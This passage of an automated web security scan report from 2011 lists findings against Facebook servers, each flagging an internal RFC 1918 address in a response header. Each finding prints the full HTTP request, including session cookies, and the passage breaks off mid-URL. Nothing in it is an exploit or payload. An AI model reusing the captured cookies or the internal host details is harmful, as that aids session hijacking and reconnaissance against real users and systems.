/*1312167125,169775556*/

#hovercardPreload{height:0;left:0;overflow:hidden;position:absolute;top:0;width:0}
.HovercardContent{position:relative}
.HovercardOverlay{position:absolute;height:0;width:0;z
...[SNIP]...

16.50. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/T1nBWlouv6j.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yl/r/T1nBWlouv6j.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yl/r/T1nBWlouv6j.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 21 Jul 2011 17:04:19 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 464
Cache-Control: public, max-age=30270645
Expires: Tue, 31 Jul 2012 02:55:10 GMT
Date: Mon, 15 Aug 2011 18:24:25 GMT
Connection: close

/*1312167297,169776320*/

.sp_4w38az{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/z1xzUcShxUD.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_c2fd
...[SNIP]...

16.51. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/gjR314n9JTe.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ym/r/gjR314n9JTe.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ym/r/gjR314n9JTe.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Sat, 06 Aug 2011 20:34:10 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 913
Cache-Control: public, max-age=30883771
Expires: Tue, 07 Aug 2012 05:13:50 GMT
Date: Mon, 15 Aug 2011 18:24:19 GMT
Connection: close

/*1312780461,169776066*/

.uiButtonOverlay{-webkit-background-clip:padding-box;background-color:#fff;background-image:none;border-color:#ccc;border-color:rgba(0, 0, 0, .2);-webkit-border-radius:2px}
.
...[SNIP]...

16.52. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/ofNbJ9YoFJM.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yr/r/ofNbJ9YoFJM.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yr/r/ofNbJ9YoFJM.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 01 Aug 2011 02:31:57 GMT
X-FB-Server: 10.138.69.184
Content-Length: 1366
Vary: Accept-Encoding
Cache-Control: public, max-age=30269482
Expires: Tue, 31 Jul 2012 02:51:20 GMT
Date: Mon, 15 Aug 2011 18:39:58 GMT
Connection: close

/*1312167124,176833976*/

h1.marketingHeadline{color:#333;font-weight:normal}
h1.marketingHeadlineSmall{font-size: 20px}
h1.marketingHeadlineMedium{font-size: 24px}
h1.marketingHeadlineLarge{font-size
...[SNIP]...

16.53. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/K1vbE3QBhxb.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yv/r/K1vbE3QBhxb.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yv/r/K1vbE3QBhxb.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 09:26:22 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 5234
Vary: Accept-Encoding
Cache-Control: public, max-age=30913341
Expires: Tue, 07 Aug 2012 13:41:45 GMT
Date: Mon, 15 Aug 2011 18:39:24 GMT
Connection: close

/*1312810905,169776068*/

if (window.CavalryLogger) { CavalryLogger.start_js(["dfQwr"]); }

function scribe_log(a,b){new AsyncSignal('/ajax/scribe_log.php',{category:a,message:b}).send();}function tex
...[SNIP]...

16.54. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/z1xzUcShxUD.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yz/r/z1xzUcShxUD.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yz/r/z1xzUcShxUD.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 588
Content-Type: image/png
Last-Modified: Fri, 01 Jul 2011 01:41:48 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Cache-Control: public, max-age=29661299
Expires: Tue, 24 Jul 2012 01:39:31 GMT
Date: Mon, 15 Aug 2011 18:24:32 GMT
Connection: close

.PNG
.
...IHDR...!...F.....u......PLTE......CW.......^uq.....................U.......T\lx..l}...........N....0D..........q.................{.......................v......%....................;....
...[SNIP]...

16.55. http://www.facebook.com/ConanTheBarbarian  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ConanTheBarbarian

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ConanTheBarbarian?sk=app_108503912579284 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; rdir=/login.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.43.49
X-Cnection: close
Date: Mon, 15 Aug 2011 18:24:20 GMT
Content-Length: 49693

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...

16.56. http://www.facebook.com/ConanTheBarbarian  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ConanTheBarbarian

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ConanTheBarbarian?sk=photos HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; wd=1123x954; act=1313433582687%2F1; _e_mTli_0=%5B%22mTli%22%2C1313433582688%2C%22act%22%2C1313433582687%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos%22%2C%22click%22%2C%22click%22%2C%22fbx_navigation%22%2C%22r%22%2C%22%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C80%2C824%2C49%2C1008%2C16%5D; x-src=%2FConanTheBarbarian%7Cpagelet_fbx_navigation

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.239.39
X-Cnection: close
Date: Mon, 15 Aug 2011 18:38:47 GMT
Content-Length: 119745

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...

16.57. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=64b385429f05b2492d713f343d05ba02&app_id=64b385429f05b2492d713f343d05ba02&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df210d100c4%26origin%3Dhttp%253A%252F%252Ftech.fortune.cnn.com%252Ff2e48d56d4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ad50e544%26origin%3Dhttp%253A%252F%252Ftech.fortune.cnn.com%252Ff2e48d56d4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30d9fb158%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f6b9f9ec%26origin%3Dhttp%253A%252F%252Ftech.fortune.cnn.com%252Ff2e48d56d4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30d9fb158&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36a612e0%26origin%3Dhttp%253A%252F%252Ftech.fortune.cnn.com%252Ff2e48d56d4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30d9fb158&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bcf4fb1%26origin%3Dhttp%253A%252F%252Ftech.fortune.cnn.com%252Ff2e48d56d4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30d9fb158&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.201.49
X-Cnection: close
Date: Mon, 15 Aug 2011 18:47:48 GMT
Content-Length: 252

<script type="text/javascript">
parent.postMessage("cb=f36a612e0&origin=http\u00253A\u00252F\u00252Ftech.fortune.cnn.com\u00252Ff2e48d56d4&relation=parent&transport=postmessage&frame=f30d9fb158", "htt
...[SNIP]...

16.58. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=127985000593639&app_id=127985000593639&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2280f9238%26origin%3Dhttp%253A%252F%252Fbreak-portal.com%252Ffda8dea0c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3dd1c9f08%26origin%3Dhttp%253A%252F%252Fbreak-portal.com%252Ffda8dea0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df277f7324c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfee5dab6c%26origin%3Dhttp%253A%252F%252Fbreak-portal.com%252Ffda8dea0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df277f7324c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e839cc14%26origin%3Dhttp%253A%252F%252Fbreak-portal.com%252Ffda8dea0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df277f7324c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1456c56c%26origin%3Dhttp%253A%252F%252Fbreak-portal.com%252Ffda8dea0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df277f7324c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://break-portal.com/game/breakgame/?game=conan-the-barbarian-3d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; wd=1123x954

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.42.32
X-Cnection: close
Date: Mon, 15 Aug 2011 18:25:50 GMT
Content-Length: 243

<script type="text/javascript">
parent.postMessage("cb=f2e839cc14&origin=http\u00253A\u00252F\u00252Fbreak-portal.com\u00252Ffda8dea0c&relation=parent&transport=postmessage&frame=f277f7324c", "http:\/
...[SNIP]...

16.59. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=64b385429f05b2492d713f343d05ba02&app_id=64b385429f05b2492d713f343d05ba02&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa0445a9c%26origin%3Dhttp%253A%252F%252Fwww.cnn.com%252Ff163390b7c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c4d1d4fc%26origin%3Dhttp%253A%252F%252Fwww.cnn.com%252Ff163390b7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30425b38%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bb25ce14%26origin%3Dhttp%253A%252F%252Fwww.cnn.com%252Ff163390b7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30425b38&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b5571b0%26origin%3Dhttp%253A%252F%252Fwww.cnn.com%252Ff163390b7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30425b38&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1996ebbd4%26origin%3Dhttp%253A%252F%252Fwww.cnn.com%252Ff163390b7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30425b38&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.171.34
X-Cnection: close
Date: Mon, 15 Aug 2011 18:45:14 GMT
Content-Length: 233

<script type="text/javascript">
parent.postMessage("cb=f3b5571b0&origin=http\u00253A\u00252F\u00252Fwww.cnn.com\u00252Ff163390b7c&relation=parent&transport=postmessage&frame=f30425b38", "http:\/\/www.
...[SNIP]...

16.60. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=108503912579284&app_id=108503912579284&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df172165908%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=0&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1416d0dc%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b846cdbc%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df4c0ff41%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df379b0b22c%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://viral.lionsgate.com/conanthebarbarian/facebook/game/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; wd=1123x954

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.22.57
X-Cnection: close
Date: Mon, 15 Aug 2011 18:25:38 GMT
Content-Length: 247

<script type="text/javascript">
parent.postMessage("cb=f4c0ff41&origin=http\u00253A\u00252F\u00252Fviral.lionsgate.com\u00252Ff1f34393a8&relation=parent&transport=postmessage&frame=fd507147", "http:\/
...[SNIP]...

16.61. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=64b385429f05b2492d713f343d05ba02&app_id=64b385429f05b2492d713f343d05ba02&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfed1f8024%26origin%3Dhttp%253A%252F%252Fwww.cnn.com%252Ff163390b7c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26ecb6ed8%26origin%3Dhttp%253A%252F%252Fwww.cnn.com%252Ff163390b7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14a7778dc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25f626e64%26origin%3Dhttp%253A%252F%252Fwww.cnn.com%252Ff163390b7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14a7778dc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2F